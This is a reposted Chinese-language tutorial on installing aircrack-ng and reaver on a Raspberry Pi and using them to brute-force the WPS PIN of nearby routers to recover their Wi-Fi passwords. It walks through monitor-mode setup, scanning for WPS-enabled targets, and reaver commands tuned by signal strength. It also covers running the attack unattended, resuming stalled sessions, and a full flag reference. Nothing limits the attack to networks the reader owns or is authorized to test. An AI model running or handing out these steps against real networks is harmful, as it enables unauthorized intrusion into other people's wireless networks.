樹莓派(RASPBERRYPI)安裝AIRCRACK-NG,REAVER及WIFI破解教程[整理]，樹莓派aircrack

樹莓派(RASPBERRYPI)安裝AIRCRACK-NG,REAVER及WIFI破解教程[整理]，樹莓派aircrack
原文連結：http://www.findspace.name/res/1184

轉載請註明

硬體環境

樹莓派B+一個（我用的是debian環境）
PC一台（或其它裝置直接操作PI就行）
無線網卡（能用就行，不過強大的無線網卡會事半功倍，我用的3070）

Find註：

無線網卡不是哪個都行，需要支援監聽模式才可以，支援列表可以查看這裡： https://wikidevi.com/wiki/Wireless_adapters/Chipset_table

安裝依賴包

sudo apt-get install -y libpcap-dev libsqlite3-dev sqlite3 libpcap0.8-dev libssl-dev build-essential iw tshark subversionsudo apt-get install libnl-3-200 libnl-3-dev libnl-3-doc libnl-genl-3-dev libnl-genl-3-200

安裝aircarck-ng

svn co http://svn.aircrack-ng.org/trunk/ aircrack-ngcd aircrack-ng/makesudo make install

安裝reaver

wget http://reaver-wps.googlecode.com/files/reaver-1.4.tar.gztar zxvf reaver-1.4.tar.gzcd reaver-1.4/src./configuremakesudo make install

以上兩個資源套件都可以在這裡找到：
百度網盤分享
如果安裝成功後，會有airmon-ng,airodump-ng,reaver等命令可用。

破解教程


sudo airmon-ng start wlan0
sudo airodump-ng mon0


根據上面的airodump搜尋到的無線訊號，然後可以挑訊號強的進行破解（注意，要選擇開了WPS功能的）
注意看這張列表，列表中顯示了你周邊無線相關資訊。注意看 MB 這一列，顯示為” 54 “、”54e. “等等，這表示了無線當前的速率模式以及WPS開啟狀況，我自己的路由器是 “steve”，注意看，”54e“和” 54e. “是不同的，多了一個 點，這個點表示開啟了 wps模式。所以我們下面就進行wps的探測，在這裡我們要記住SSID對應的MAC地址，此後我們會針對MAC地址進行攻擊和探測。
![][3]

sudo reaver -i mon0 -b 00:00:00:00:00:00 -a -S -vv -d2 -t 5 -c 11

-vv 是查看詳細資料的，等你熟練了之後，你就可以使用 -v ，這樣就簡單了。通常，遇到問題才會使用 -vv 。
如果想掛機破解，記得加上nohup命令後，可以斷開ssh。然後剩下就是等待。

nohup sudo reaver -i mon0 -b 00:00:00:00:00:00 -a -S -vv -d2 -t 5 -c 11 -o fbi &

-o參數是輸出到檔案
如果破解成功後，開啟輸出的日誌，就可以看到reaver出來的密碼。
![][4]

命令說明：reaver使用方法：

airmon-ng start wlan0 //啟動mon0監控
reaver -i mon0 -b MAC -a -S -vv //普通用法

如果，90.9%進程後死機或停機，請記下PIN前四位元，用指令：

reaver -i mon0 -b MAC -a -vv -p XXXX(PIN前四位元)

其他命令

airodump-ng mon0 用來掃描周圍無線訊號
wash -i mon0 -C 這個是用來檢測周圍無線支援PIN的路由

如果一直pin不動，嘗試加-N參數

reaver -i mon0 -b xx:xx:xx:xx:xx:xx -d 0 -vv -a -S -N
也可以加延時 -t 3 -b 3

常用參數釋疑

-i 監聽後介面名稱 網卡的監視介面，通常是mon0
-b 目標mac地址 AP的MAC地址
-a 自動檢測目標AP最佳配置
-S 使用最小的DH key，可以提高PJ速度
-vv 顯示更多的非嚴重警告
-d 即delay每窮舉一次的閑置時間 預設為1秒
reaver -i mon0 -b MAC -d 0
用上述指令可以大幅加快PJ速度 但是有些AP可能受不了
-c （後跟頻道數） 指定頻道,可以方便找到訊號
-p 數字 PIN 碼四位或八位 //已知pin碼前4位可以帶此參數，指定從這個數字開始pin。可以用8位直接找到密碼。
-N 不發送NACK資訊（如果一直pin不動，可以嘗試這個參數）
-n 對目標AP總是發送NACK，預設自動
-t 即timeout每次窮舉等待反饋的最長時間，如果訊號不錯，可以這樣###設定
reaver -i mon0 -b MAC -d 0 -t .5
-m, –mac= 指定本機MAC地址，在AP有MAC過濾的時候需要使用

小結-PJ時應因狀況調整參數:

訊號非常好:
reaver -i mon0 -b MAC -a -S -vv -d 0 -c 1
訊號普通:
reaver -i mon0 -b MAC -a -S -vv -d .5 -t .5 -c 1
訊號一般:
reaver -i mon0 -b MAC -a -S -vv -c 1

當出現有百分數時你就可以用crtl+c來暫停，它會將reaver的進度表檔案儲存在
1.3版：
/etc/reaver/MAC地址.wpc
1.4版：
/usr/local/etc/reaver/MAC地址.wpc
用資源管理員，手工將以MAC地址命名的、後輟為wpc的檔案拷貝到隨身碟或硬碟中，
下次重啟動後，再手工複製到/etc/reaver/ 目錄下即可。

不是所有的路由都支援pin學習。AP關閉了WPS、或者沒有QSS滴，會出現
WARNING: Failed to associate with XX:XX:XX:XX:XX:XX (ESSID: XXXX)
學習過程中也可隨時隨地按Ctrl+C終止PJ，重複同一個數字 PIN 碼 或 timeou t可終止，reaver會自動儲存進度。
繼續上次的PJ，則再次在終端中發送:
reaver -i mon0 -b MAC -vv
這條指令下達後，會讓你選y或n，選y後就繼續了
當reaver確定前4位PIN密碼後，其工作完成任務進度數值將直接跳躍至90.9%以上，也就是說只剩餘一千個密碼組合了（總共一萬一千個密碼）。

參數詳細說明:
-m, –mac= MAC of the host system
指定本機MAC地址，在AP有MAC過濾的時候需要使用
-e, –essid= ESSID of the target AP
路由器的ESSID，一般不用指定
-c, –channel= Set the 802.11 channel for the interface (implies -f)
訊號的頻道，如果不指定會自動掃描
-o, –out-file= Send output to a log file [stdout]
標準輸出到檔案
-s, –session= Restore a previous session file
恢複進程檔案
-C, –exec= Execute the supplied command upon successful pin recovery
pin成功後執行命令
-D, –daemonize Daemonize reaver
設定reaver成Daemon
-a, –auto Auto detect the best advanced options for the target AP
對目標AP自動檢測進階參數
-f, –fixed Disable channel hopping
禁止頻道跳轉
-5, –5ghz Use 5GHz 802.11 channels
使用5G頻道
-v, –verbose Display non-critical warnings (-vv for more)
顯示不重要警告資訊 -vv 可以顯示更多
-q, –quiet Only display critical messages
只顯示關鍵資訊
-h, –help Show help
顯示協助

-vv 顯示更多的非嚴重警告

進階參數:
-p, –pin= Use the specified 4 or 8 digit WPS pin
直接讀取psk（本人測試未成功，建議用網卡內建軟體擷取）
-d, –delay= Set the delay between pin attempts 1
pin間延時，預設1秒，推薦設0
-l, –lock-delay= Set the time to wait if the AP locks WPS pin attempts [60]
AP鎖定WPS後等待時間
-g, –max-attempts= Quit after num pin attempts
最大pin次數
-x, –fail-wait= Set the time to sleep after 10 unexpected failures [0]
10次意外失敗後等待時間，預設0秒
-r, –recurring-delay= Sleep for y seconds every x pin attempts
每x次pin後等待y秒
-t, –timeout= Set the receive timeout period [5]
收包逾時，預設5秒
-T, –m57-timeout= Set the M5/M7 timeout period [0.20]
M5/M7逾時，預設0.2秒
-A, –no-associate Do not associate with the AP (association must be done by another application)
不連入AP（連入過程必須有其他程式完成）
-N, –no-nacks Do not send NACK messages when out of order packets are received
不發送NACK資訊（如果一直pin不動，可以嘗試這個參數）
-S, –dh-small Use small DH keys to improve crack speed
使用小DH關索引值提高速度（推薦使用）
-L, –ignore-locks Ignore locked state reported by the target AP
忽略目標AP報告的鎖定狀態
-E, –eap-terminate Terminate each WPS session with an EAP FAIL packet
每當收到EAP失敗包就終止WPS進程
-n, –nack Target AP always sends a NACK [Auto]
對目標AP總是發送NACK，預設自動
-w, –win7 Mimic a Windows 7 registrar [False]
類比win7註冊，預設關閉

Reference:
http://lok.me/a/1972.html
http://bao3.blogspot.com/2013/05/raspberry-pi.html
http://tieba.baidu.com/p/2682878857
http://www.nyaboron.moe/posts/606.html

[3]: http://lok.me/wp-content/uploads/2014/11/2.png “”
[4]: http://lok.me/wp-content/uploads/2014/11/3.png “”